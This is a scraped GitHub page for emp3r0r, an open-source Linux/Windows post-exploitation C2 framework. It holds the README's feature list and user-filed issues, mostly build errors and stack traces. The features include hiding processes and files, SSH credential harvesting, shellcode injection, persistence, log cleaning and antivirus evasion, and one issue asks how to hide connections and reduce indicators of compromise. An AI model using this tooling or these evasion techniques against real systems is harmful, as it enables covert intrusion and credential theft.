jm33-m0 / emp3r0r Goto Github PK

View Code? Open in Web Editor NEW

1.3K 36.0 235.0 128.79 MB

Linux/Windows post-exploitation framework made by linux user

Home Page: https://infosec.exchange/@jm33

License: MIT License

Python 13.46% Go 64.74% Shell 16.20% C 5.23% Makefile 0.14% Assembly 0.23%

post-exploitation stealth linux hacking-tool emp3r0r rat trojan-malware malware redteam redteaming

emp3r0r's Introduction

emp3r0r

A post-exploitation framework for Linux/Windows

Status

emp3r0r C2 (Linux/Windows) is ready for testing. Please report bugs if you find any.
Read wiki to get started
Download from here
Write modules for emp3r0r with your favorite languages
SSH harvester is ready for use
Windows support is ready with fully-interactive shell

ssh-harvester.mp4

MORE screenshots

Motivation

Initially, emp3r0r was developed as one of my weaponizing experiments. It was a learning process for me trying to implement common Linux adversary techniques and some of my original ideas.

So, what makes emp3r0r different? First of all, it is the first C2 framework that targets Linux platform including the capability of using any other tools through it. Take a look at the features for more valid reasons to use it.

To support third-party modules, emp3r0r has complete python3 support, included in vaccine module, 15MB in total, with necessary third party packages such as Impacket, Requests and MySQL.

Features

Beautiful Terminal UI
- Use tmux for window management
Stealth
- Automatically changes argv so you won't notice it in ps listing
- Hide files and PIDs via Glibc hijacking (patcher in get_persistence)
- Built-in Elvish Shell with the same disguise as main process
- All C2 communications made in HTTP2/TLS
- Defeat JA3 fingerprinting with UTLS
- Painlessly encapsulated in Shadowsocks and KCP
- Able to encapsulate in any external proxies such as TOR and CDNs
- C2 relaying via SSH
- DLL agent
Multi-Tasking
- Don't have to wait for any commands to finish
Module Support
- Provides python3 environment that can easily run your exploits/tools on any Linux host
- Custom Modules
Perfect Shell Experience via SSH with PTY support
- Compatible with any SSH client and available for Windows
Bettercap
Auto persistence via various methods
Post-exploitation Tools
- Nmap, Socat, Ncat, Bettercap, etc
Credential Harvesting
- OpenSSH password harvester
Process Injection
Shellcode Injection
ELF Patcher for persistence
Packer
- Encrypts and compresses agent binary and runs agent in a covert way
Hide processes and files and get persistence via shared library injection
Networking
- Port Mapping
  - From C2 side to agent side, and vice versa
  - TCP/UDP both supported
- Agent Side Socks5 Proxy with UDP support
Auto Root
LPE Suggest
System Info Collect
File Management
- Enables resumable downloads/uploads
- SFTP support: browse remote files with any SFTP client, including your local GUI file manager
Log Cleaner
Screenshot
Anti-Antivirus
Internet Access Checker
Automatically bridge agents from internal networks to C2
- For semi-isolated networks
Proxy via agent to agent SSH connection
- To bring any targets you can reach to C2
Interoperability with Metasploit/Cobalt Strike
and many more :)

emp3r0r's People

Contributors

Stargazers

Watchers

Forkers

triplekill 5l1v3r1 cx01 listinvest 0xr0 hadesangel fadinglr istoliving ifishzz m4rdukkkkk supersyt dushangit echo-ray realxyth wisdark happyqingye geekmc nusiloot zuchuanchengxuyuan office-of-tailored-access-operations isgasho ii0 3t2ugg1e sobinge fuckgitb rgzn-aiyun selfevo baka9moe kksamoy isarabia92 1r0dm480 fengjixuchui nareshmail iiiusky goowen l34rn rajivraj saraiva dd404x kakuye exi1sh0w sashka3076 samuelriesz jack51706 zha0 avgirl crackercat eniac888 bingo007 dayuxiyou projectzerodays hackinfinity bloodandwolf aplus123 h1d3r bigbrobro hackdou kepler404 dkhead777 red-infosec peacesh4wn hanshou101 recoxv1 amdyes-droid 10cks ret2basic xstpl rv0p111 reanimat0r netkid123 lichnak alfonmga mrobot7569 eshad danielwu182 haraprasadghosh sesyi bitcloudson tor-0 asdeegen ygemici fenajojuk changheluor007 gavz gotorland andrflor 3453-315h 4v4loon haseebch-hack stemmm pingxcpost securityanalysts gh0st0ne securitytech101 yaebawaez optionalg miven hades-ak1 grehand tehseensagar

emp3r0r's Issues

Need Custom Agent Tag

Need Custom Agent Tag Or Add Custom Agent Label

Because once the Agent exceeds a certain number, it will be difficult to identify

Good Job

Tmux

You know how it is,
Also note: I did reinstall and retry your update still inst working though.

Injector: syscall.Ptrace*: no such process

This seems to be an issue with golang itself.
When the tracee is not our child process, and/or ptrace attribute is not set to true, we lose control to the tracee immediately.

The reason: PtraceAttach and PtraceGetRegs are from different processes/threads

NO PTY error

emp3r0r/core/lib/cc/ssh.go

Line 87 in 6d022f3

 return OpenInNewTerminalWindow(fmt.Sprintf("ssh-%s", CurrentTarget.Hostname), sshCmd) 

ssh cannot create PTY session correctly

Unknown crash

emp3r0r/core/cmd/agent/main.go

Line 89 in 5c63f7a

log.Printf("[+] Thank you! We got a proxy: %s", agent.AgentProxy)

agent.AgentProxy can somehow turn to nil to cause this crash

The reason is unclear, I'm looking into it

KCP: CC unable to detect agent disconnection

When an agent using KCP+Shadowsocks as C2 transport dies, C2 is not aware of its disconnection

go readline fails on kvm systems

The prompt string doesn't show, and readline is completely unusable.

Network Scanning Idea

Hopefully this could save you development time, if not don't worry about this idea.

In your future releases list you have network scanning, instead of building and maintaining a scanner.
You could use bettercap as it can do active and passive scanning as well as other things.

You could drop the binary to memory and get it to do all the work and manage it via commands.

AttributeError: 'GoBuild' object has no attribute 'AgentRoot'

./build.py cc
Clean everything and start over? [Y/n] y
CC server address (domain name or ip address, can be more than one, separate with space):

127.0.0.1
[!] Exception:
Traceback (most recent call last):
File "/home/kali/Downloads/emp3r0r-1.1.2/core/./build.py", line 709, in
main(sys.argv[1])
File "/home/kali/Downloads/emp3r0r-1.1.2/core/./build.py", line 479, in main
gobuild = GoBuild(target="cc", cc_ip=ccip, cc_other_names=cc_other)
File "/home/kali/Downloads/emp3r0r-1.1.2/core/./build.py", line 110, in init
CACHED_CONF['agent_root'] = self.AgentRoot
AttributeError: 'GoBuild' object has no attribute 'AgentRoot'

Proxy: panic: Write called after Handler finished

emp3r0r/core/lib/cc/proxy.go

Line 211 in d84b0d2

_, err = io.Copy(sh.H2x.Conn, conn)

emp3r0r @ubuntu\ubuntu_1179 (run_proxy) > panic: Write called after Handler finished

goroutine 4009 [running]:
net/http.(*http2responseWriter).write(0xc00047a048, 0x3, 0xc000366000, 0x3, 0x8000, 0x0, 0x0, 0x8, 0xc0004c4d40, 0x4b5c95)
        /usr/lib/go-1.13/src/net/http/h2_bundle.go:6233 +0x1fb
net/http.(*http2responseWriter).Write(0xc00047a048, 0xc000366000, 0x3, 0x8000, 0x503b4f, 0xc0005de180, 0xc000366000)
        /usr/lib/go-1.13/src/net/http/h2_bundle.go:6222 +0x56
github.com/posener/h2conn.(*flushWrite).Write(0xc000162240, 0xc000366000, 0x3, 0x8000, 0x50ff38, 0xc0005de180, 0xc000366000)
        /home/jm33/go/pkg/mod/github.com/posener/[email protected]/server.go:72 +0x55
github.com/posener/h2conn.(*Conn).Write(0xc0004ea500, 0xc000366000, 0x3, 0x8000, 0x0, 0x0, 0x0)
        /home/jm33/go/pkg/mod/github.com/posener/[email protected]/conn.go:35 +0xc7
io.copyBuffer(0x9acd20, 0xc0004ea500, 0x9acfc0, 0xc0004e8008, 0xc000366000, 0x8000, 0x8000, 0xc0004c4fa8, 0x64a91b, 0xcd3068)
        /usr/lib/go-1.13/src/io/io.go:404 +0x1fb
io.Copy(...)
        /usr/lib/go-1.13/src/io/io.go:364
github.com/jm33-m0/emp3r0r/core/lib/cc.(*PortFwdSession).RunPortFwd.func1.2(0xc0005dc1e0, 0xc0002446f0, 0x9bade0, 0xc0004e8008, 0xc0001920f0)
        /home/jm33/projects/emp3r0r/core/lib/cc/proxy.go:212 +0xdc
created by github.com/jm33-m0/emp3r0r/core/lib/cc.(*PortFwdSession).RunPortFwd.func1
        /home/jm33/projects/emp3r0r/core/lib/cc/proxy.go:210 +0x1d4

Windows agent: `interactive_shell` unusable

emp3r0r is written in golang, with multi-platform support as its special feature.
I'm very sorry to find that support was removed after tag 1.4.1

I hope to continue to support the windows platform,thx.
Originally I wanted to submit agentw interactive_shell's PR.
Suddenly found no agentw directory.

Can I continue to submit code?
Mainly fixes the error of not being able to input with interactive_shell on windows.

Error building: missing go dependencies

This is what i get

I have go, tmux and everything needed to install but i don't understand why it won't build.

Go Version: go version go1.16.3 linux/amd64
Py Version: Python 3.8.5
OS Version: Ubuntu 20.04.2 LTS x86_64

Port-Fwd packet loss

Using ncat to test, the port-mapping works okay, most messages get sent and received, but sometimes messages sent from CC are not displayed on agent's side.

If take ssh port as an example, ssh doesn't even work as it complains about bad packet or something.

Port-Fwd on agent always forward to the target port of latest session

When more than 1 port-fwd sessions exist, all data sent by CC get redirected to the newly specified target port instead of the port it should be forwarded to.

[FEATURE REQ] Reduce IOCs (Indicators of Compromise)

工具很好用，功能齐全，感谢大佬开源这么好的工具，唯一感觉不足的是妥协指标太多了，有好几个sock文件，也监听了几个端口，这些要是能精简优化一下就完美了

Dropper: ValueError: Can only assign sequence of same size

when i use "Download an ELF and execute with memfd_create” from ubuntu18.04, there are return the above error

Suggest：the windows version of the agent

I have try to build,But there are bugs：

Use cached CC address (fuckyou.com)? [Y/n] 
Use cached CC indicator (https://fuckyou.com/status.txt)? [Y/n] 
Use cached 432 bytes of guardian shellcode (%temp%)? [Y/n] 
 Copy ./tls/emp3r0r-key.pem to ./build
 Copy ./tls/emp3r0r-cert.pem to ./build
GO BUILD starts...
# github.com/vishvananda/netns
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:27:13: undefined: syscall.Stat_t
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:28:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:31:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:39:8: undefined: syscall.Stat_t
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:43:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:52:8: undefined: syscall.Stat_t
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:56:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:70:29: cannot use int(*ns) (type int) as type syscall.Handle in argument to syscall.Close
# github.com/zcalusic/sysinfo
/root/go/pkg/mod/github.com/zcalusic/[email protected]/kernel.go:24:12: undefined: syscall.Utsname
/root/go/pkg/mod/github.com/zcalusic/[email protected]/kernel.go:25:12: undefined: syscall.Uname
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:78:15: undefined: syscall.Mmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:78:56: undefined: syscall.PROT_READ
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:78:75: undefined: syscall.MAP_SHARED
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:82:9: undefined: syscall.Munmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:99:14: undefined: syscall.Mmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:99:58: undefined: syscall.PROT_READ
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:99:77: undefined: syscall.MAP_SHARED
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:103:8: undefined: syscall.Munmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:103:8: too many errors
GO BUILD ends...
go build failed

build.py:
/dev/shm/.{rand_str(random.randint(3, 9))} ---> %temp%
just suggest :)

Unable to generate new server certificate when requested with new server names

emp3r0r/core/lib/cc/buildAgent.go

Lines 188 to 196 in 1e1259f

 cc_hosts := strings.Fields(ans) 

 RuntimeConfig.CCHost = cc_hosts[0] 

 exists := false 

 for _, c2_name := range cc_hosts { 

 if c2_name == RuntimeConfig.CCHost { 

 exists = true 

 break 

 } 

 }

It's a bug caused by failure to extract all names from current server certificate. The check above obviously doesn't work (have no idea why I wrote that🤣)

Error while building Agent with Indicator URL (expected 'package', found https)

$ ./build.py agent
Use cached CC address (localhost)? [Y/n] n
Clean everything and start over? [Y/n] Y
 Deleted ./tls/emp3r0r-cert.pem
 Deleted ./tls/emp3r0r-key.pem
 Deleted ./tls/openssl-42c0be74-52ad-11eb-a236-3aad793bbfde.cnf
 Deleted ./build/agent
 Deleted ./build/build.json
 Deleted ./build/cc
 Deleted ./build/emp3r0r-cert.pem
 Deleted ./build/emp3r0r-key.pem
 Deleted ./build/emp3r0r.history
Traceback (most recent call last):
  File "./build.py", line 163, in clean
    os.remove(f)
IsADirectoryError: [Errno 21] Is a directory: './build/[agent_root]'
 Deleted ./tls/42c0be74-52ad-11eb-a236-3aad793bbfde-req.csr
CC server address (domain name or ip address): 127.0.0.1
Use cached CC indicator ()? [Y/n] n
CC status indicator: https://gist.githubusercontent.com/ID/raw/ID/gistfile1.txt
[!] Generating new certs...
>> creating serial
>> generating a keypair for: f02c3c48-52b0-11eb-a236-3aad793bbfde
.. key
Generating RSA private key, 2048 bit long modulus (2 primes)
...+++++
...+++++
e is 65537 (0x010001)
.. request
.. certificate
Signature ok
subject=CN = f02c3c48-52b0-11eb-a236-3aad793bbfde.com
Getting CA Private Key
.. removing key password
writing RSA key
<< f02c3c48-52b0-11eb-a236-3aad793bbfde keypair generated.
 Copy ./tls/emp3r0r-cert.pem to ./build
 Copy ./tls/emp3r0r-key.pem to ./build
GO BUILD starts...
../../internal/agent/def.go:1:1: expected 'package', found https <------------------
GO BUILD ends...
go build failed

build.py port number randomization

CC and agent get different randomized ports on build time

Use the latest release

The master branch is being updated nightly, there's no guarantee that it will work.
If you want a stable version, download the ZIP from latest release.

[Features] add WEB GUI access

This project is awesome, could you please add web GUI access to this like old empire GUI web-access?

Regards

build error

[*] Copying CC keypair to ./build
 Copy ./tls/emp3r0r-cert.pem to ./build
 Copy ./tls/emp3r0r-key.pem to ./build
GO BUILD starts...
# github.com/jm33-m0/emp3r0r/core/lib/cc
../../lib/cc/cmd.go:133:77: undefined: log.Lmsgprefix
GO BUILD ends...
go build failed

SSH client should handle EOF error

emp3r0r/core/lib/agent/sshproxy.go

Line 126 in c382db2

log.Printf("SSHProxyClient listener: %v", err)

When an agent dies, ssh client should cleanup the connection instead of waiting forever

Reverse proxy: proxy cannot be set when there's no broadcast received

emp3r0r/core/lib/agent/broadcast.go

Line 78 in 9d8b4c7

// does the proxy work?

This check should be started in a separate goroutine

Error building

Just downloaded and used python3 build.py cc

Clean everything and start over? [Y/n] Y
CC server address (domain name or ip address, can be more than one, separate with space):
> XXXXXX.XXX
[!] Generating new certs...
>> generating a certificate authority
Generating RSA private key, 2048 bit long modulus (2 primes)
..+++++
...................................+++++
e is 65537 (0x010001)
req: Skipping unknown attribute "prompt"
<< certificate authority generated.
>> creating serial
>> generating a keypair for: 06ebf456-c6d7-11eb-b926-979f681e338f
.. key
Generating RSA private key, 2048 bit long modulus (2 primes)
............................+++++
........................................................+++++
e is 65537 (0x010001)
.. request
.. certificate
Signature ok
subject=CN = 06ebf456-c6d7-11eb-b926-979f681e338f.com
Getting CA Private Key
.. removing key password
writing RSA key
<< 06ebf456-c6d7-11eb-b926-979f681e338f keypair generated.
[!] Exception:
Traceback (most recent call last):
  File "build.py", line 656, in <module>
    main(sys.argv[1])
  File "build.py", line 429, in main
    gobuild.build()
  File "build.py", line 87, in build
    self.set_tags()
  File "build.py", line 293, in set_tags
    "DoHServer = \"\"", f"DoHServer = \"{CACHED_CONF['doh_server']}\"")
KeyError: 'doh_server'

am i missing something?

[BUG] emp3r0r wrapper

Im am currently running Ubuntu 20.04.3 LTS.
This is what happens when I try to run em3r0r.

no server running on /tmp/tmux-1000/default
[exited]

Port-Fwd: HTTP and SSH don't work

When using ncat to test, the port-mapping works okay, I can even run a reverse shell inside ncat connection.
Other services such as SSH and HTTP server, don't work at all.

2020/03/09 10:41:58 PortFwd started: -> 80 (08d91771-4eec-4ea0-85fa-f7090b2250f5)
2020/03/09 10:42:01 Read 0 bytes from port 80: EOF
2020/03/09 10:42:01 fwdToDport 80 exited

agent: mutual protection doesn't work

emp3r0r/core/cmd/agent/main.go

Line 156 in 5163993

err = proc.Kill()

`interactive_shell` for Windows: incorrect terminal size

Overall the shell is working, and you should be able to use Tab and Ctrl in cmd and powershell sessions.

However the terminal size seems wrong, as an example, the when you issue cls to clear screen, on-screen text cannot be cleared correctly.

agent built by build.py doesn't run: Decompress ELF: gzip: invalid header

Testing on Kali Linux kali 5.14.0-kali4-amd64 #1 SMP Debian 5.14.16-1kali1 (2021-11-05) x86_64 GNU/Linux
I used ./build.py agent -y to generate a agent 。but when I run ./build/agent_[md5]，I got an error:
Decompress ELF: gzip: invalid header

[Request] Drop More to Memory

Apologies if this is already the case but, can you please drop more files to memory instead of disk and perhaps give the option to run command directly in memory.

As an example, could the custom binaries used by the reverse shell and the output from the LPE suggest be stored in memory.

libemp3r0r's bug

There is a bug in libemp3r0r, when libemp3r0r is loaded,the file will not disappear, but the name will become blank

Fatal error: concurrent map writes

goroutine 2447 [chan send, 12 minutes]:
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func2.1(0xc0001aeae0)
        lib/cc/rshell.go:53 +0x6d
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func2(0xc0001aeae0, 0xc0002583a0, 0x981ac0, 0xc000107940)
        lib/cc/rshell.go:59 +0x228
created by github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash
        lib/cc/rshell.go:50 +0x165

goroutine 2446 [chan receive, 12 minutes]:
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func1(0xc00006a6c0, 0xc0002583a0, 0x981ac0, 0xc000107940)
        lib/cc/rshell.go:34 +0x4d
created by github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash
        lib/cc/rshell.go:33 +0x114

goroutine 2465 [chan receive, 12 minutes]:
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func4(0xc000201500, 0xc00000e0e8, 0xc0001aeae0, 0xc000266d70, 0x981ac0, 0xc000107940)
        lib/cc/rshell.go:135 +0x52
created by github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash
        lib/cc/rshell.go:134 +0x494

wait4 does not work

emp3r0r/shellcode/guardian.asm

Line 25 in 131aea9

;; wait to clean up zombies

on success, returns the process ID of the child whose
state has changed; if WNOHANG was specified and one or more
child(ren) specified by pid exist, but have not yet changed
state, then 0 is returned. On error, -1 is returned.

And it returns 0 as I see in gdb

reverse shell: local terminal is messed up when re-run `bash`

emp3r0r/core/internal/cc/rshell.go

Line 18 in 4ede2fd

func reverseBash() {

On the first run, bash works mostly good, the terminal is functional.
However, if we exit current bash session, and re-run bash on whatever target, the terminal is totally unusable as all characters are scambled

生成不了Linux agent

about hidden tcp connection and port and pid

一直在关注您的这个项目。
现在Linux c2 agent最大的短板就是隐藏IP连接隐藏进程和文件就这3个差不多了
不然做后渗透一个命令 netstat -untp就会发现可疑进程和连接然后结束进程木马就掉了权限就没了
很抱歉和您提这些就是您的项目真的很完美我从freebuf关注您到现在
就是我自己没有太新颖的思路隐藏（或者自己借助第三方工具隐藏等）。但我发现您的项目也有可以隐藏的项目开发
有lkm和用户级的隐藏我觉得隐藏是所有Linux远控的一大痛点，如果这个项目能把这个做好之前的emp3r0r项目的agent某版本好像会本地开个端口，也很容易被运维的发现。
虽然这个项目任然很完美但我为什么和您说就是希望他更完美他的功能完爆所有Linuxcc 这个只是我个人短浅之见
谢谢您您能够看到我的提交。

Memory size is 0MB on Windows targets

fixed in f5dc49c

Agent Daemon Error

[root@vultr shm]# ./emp3r0r -cdnproxy "wss://example.com/path/to/websocket/server" -daemon
emp3r0r agent has started
2021/03/07 14:23:33 Testing if agent is alive...
2021/03/07 14:23:33 Seems dead: dial unix /dev/shm/.246d895/.s6Y4tDtahIuL: connect: connection refused
2021/03/07 14:23:33 Failed to kill old emp3r0r os: process already finished
2021/03/07 14:23:33 /dev/shm/.246d895/.s6Y4tDtahIuL exists, testing connection...
2021/03/07 14:23:33 Testing if agent is alive...
2021/03/07 14:23:33 Seems dead: dial unix /dev/shm/.246d895/.s6Y4tDtahIuL: connect: connection refused

But
./emp3r0r -cdnproxy "wss://example.com/path/to/websocket/server"
this is ok

and by the way,how to correct use libemp3r0r ????

build error

compile: version "go1.12.4" does not match go tool version "go1.15.6"
# internal/cpu
flag provided but not defined: -p
usage: asm [options] file.s ...
Flags:
  -D value
        predefined symbol with optional simple value -D=identifier=value; can be set multiple times
  -I value
        include directory; can be set multiple times
  -S    print assembly and machine code
  -V    print version and exit
  -debug
        dump instructions as they are parsed
  -dynlink
        support references to Go symbols defined in other shared libraries
  -e    no limit on number of errors reported
  -gensymabis
        write symbol ABI information to output file, don't assemble
  -o string
        output file; default foo.o for /a/b/c/foo.s as first argument
  -shared
        generate code that can be linked into a shared library
  -trimpath string
        remove prefix from recorded source file paths
# math/bits
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# runtime/internal/atomic
flag provided but not defined: -p
usage: asm [options] file.s ...
Flags:
  -D value
        predefined symbol with optional simple value -D=identifier=value; can be set multiple times
  -I value
        include directory; can be set multiple times
  -S    print assembly and machine code
  -V    print version and exit
  -debug
        dump instructions as they are parsed
  -dynlink
        support references to Go symbols defined in other shared libraries
  -e    no limit on number of errors reported
  -gensymabis
        write symbol ABI information to output file, don't assemble
  -o string
        output file; default foo.o for /a/b/c/foo.s as first argument
  -shared
        generate code that can be linked into a shared library
  -trimpath string
        remove prefix from recorded source file paths
# runtime/internal/sys
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# unicode/utf8
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# internal/race
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# sync/atomic
flag provided but not defined: -p
usage: asm [options] file.s ...
Flags:
  -D value
        predefined symbol with optional simple value -D=identifier=value; can be set multiple times
  -I value
        include directory; can be set multiple times
  -S    print assembly and machine code
  -V    print version and exit
  -debug
        dump instructions as they are parsed
  -dynlink
        support references to Go symbols defined in other shared libraries
  -e    no limit on number of errors reported
  -gensymabis
        write symbol ABI information to output file, don't assemble
  -o string
        output file; default foo.o for /a/b/c/foo.s as first argument
  -shared
        generate code that can be linked into a shared library
  -trimpath string
        remove prefix from recorded source file paths
# unicode

try to use go 1.12.4 has the same error.
3q.

C2 handshake: timeout is `0`

OS：

Linux DM 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux

Error message:

Target DM\root_c290e81fd-agent-abaf4d56-b118-f1f7-5a1b-e4039a0e81fd cannot be found, however, it left a message saying: [hellojVZyNRepkjSCXRbbweSPvVMeKMRllfuzNXJIuHEqBJfow]
2022/04/14 17:50:17 {hellojVZyNRepkjSCXRbbweSPvVMeKMRllfuzNXJIuHEqBJfow DM\root_c290e81fd-agent-abaf4d56-b118-f1f7-5a1b-e4039a0e81fd }: no agent found by this msg

I recompiled this program：

bash emp3r0r --build                       
/usr/bin/go
/data/go-workspace/go/bin/garble
[INFO] Remove temp history files.
[INFO] Building CC
# github.com/jm33-m0/emp3r0r/core/cmd/cc
HEADER = -H5 -T0x401000 -R0x1000
396423 symbols, 141457 reachable
	161575 package symbols, 150744 hashed symbols, 71502 non-package symbols, 12602 external symbols
569031 liveness data
[INFO] Building cat
# github.com/jm33-m0/emp3r0r/core/cmd/cat
HEADER = -H5 -T0x401000 -R0x1000
79132 symbols, 23634 reachable
	32443 package symbols, 31116 hashed symbols, 13233 non-package symbols, 2340 external symbols
90305 liveness data
[INFO] Building agent stub
# github.com/jm33-m0/emp3r0r/core/cmd/agent
HEADER = -H5 -T0x401000 -R0x1000
346445 symbols, 123695 reachable
	126804 package symbols, 148280 hashed symbols, 63649 non-package symbols, 7712 external symbols
567574 liveness data
[INFO] Building agent stub for Windows
# github.com/jm33-m0/emp3r0r/core/cmd/agent
HEADER = -H10 -T0xffffffffffffffff -R0xffffffff
327570 symbols, 116184 reachable
	119684 package symbols, 140536 hashed symbols, 60213 non-package symbols, 7137 external symbols
606672 liveness data
[INFO] Building Packer stub
# github.com/jm33-m0/emp3r0r/core/cmd/packer_stub
HEADER = -H5 -T0x401000 -R0x1000
304475 symbols, 62703 reachable
	111023 package symbols, 132853 hashed symbols, 55762 non-package symbols, 4837 external symbols
260346 liveness data

Need to support pre-ConPTY era Windows versions

It's quite impossible to implement interactive remote shell without ConPTY support, as explained by Microsoft itself. And the technique that I use in emp3r0r doesn't support older Windows versions such as Windows 7.

I am thinking about some possible solutions:

Fallback to non-interactive shells
Try to implement 3rd party consoles such as Mintty, requires additional files to be dropped on target

Read runtime config: should read directly from memory

Now emp3r0r agent reads its config info by parsing os.Args[0], which works in most cases. However, sometimes os.Args[0] is not guaranteed to be the (unmodified) agent binary itself, instead, it can be the executable file of injected process, or some packed agent binary.

emp3r0r/core/lib/agent/config.go

Line 22 in 5a1dcd4

jsonBegining := bytes.LastIndex(wholeStub, []byte(emp3r0r_data.MagicString))

To address this issue, it's better that we read config data from somewhere reliable, for example, we can wrap the data with our MagicString, and append it to stub.exe. When reading the config, we read /proc/self/mem and search for the magic string, split and extract our config data.

emp3r0r/core/lib/agent/poll.go HTTPClient is nil

直接运行agent emp3r0r/core/lib/agent/poll.go:32 报错panic: runtime error: invalid memory address or nil pointer dereference
可以修改emp3r0r/core/lib/agent/def.go:29 为 HTTPClient = &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}

PortFwd: session dies after start

When mapping an agent-side address to CC, the portfwd session dies immediately after handshake, and port mapping becomes unusable.

Port-Fwd target service cannot handle multiple clients

There's still an issue:
Target TCP service on agent can't send its response to correct receiver when there're more than one clients connected. All clients can send anything to target service without issue, though.

port_fwd: connection timeout

emp3r0r/core/lib/cc/ssh.go

Line 84 in 2bc9c19

wait:

When opening a new ssh session it has a >50% chance to fail, and we see a blank screen in newly opened tmux window, however the port mapping is correctly established.

CCIP parsing error

When using build.py, if only one IP is entered, the script fails to write correct IP address to build.json

Packer: dependencies missing

Im am currently running Ubuntu 20.04.3 LTS aswell go goversion of 1.16.1
I was trying to run the build.py

go: github.com/mholt/[email protected]+incompatible: missing go.sum entry; to add it:
	go mod download github.com/mholt/archiver
run cryptor.exe
sh: 1: ./cryptor.exe: not found
[!] Exception:
Traceback (most recent call last):
  File "/usr/lib/python3.8/shutil.py", line 791, in move
    os.rename(src, real_dst)
FileNotFoundError: [Errno 2] No such file or directory: 'agent.packed.exe' -> '../core/./build/cc'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "./build.py", line 629, in <module>
    main(sys.argv[1])
  File "./build.py", line 400, in main
    gobuild.build()
  File "./build.py", line 162, in build
    shutil.move("agent.packed.exe", f"../core/{targetFile}")
  File "/usr/lib/python3.8/shutil.py", line 811, in move
    copy_function(src, real_dst)
  File "/usr/lib/python3.8/shutil.py", line 435, in copy2
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.8/shutil.py", line 264, in copyfile
    with open(src, 'rb') as fsrc, open(dst, 'wb') as fdst:
FileNotFoundError: [Errno 2] No such file or directory: 'agent.packed.exe'

Error in atexit._run_exitfuncs:
Traceback (most recent call last):
  File "./build.py", line 503, in save
    readline.append_history_file(new_h_len - prev_h_len, hfile)
FileNotFoundError: [Errno 2] No such file or directory

	cc_hosts := strings.Fields(ans)
	RuntimeConfig.CCHost = cc_hosts[0]
	exists := false
	for _, c2_name := range cc_hosts {
	if c2_name == RuntimeConfig.CCHost {
	exists = true
	break
	}
	}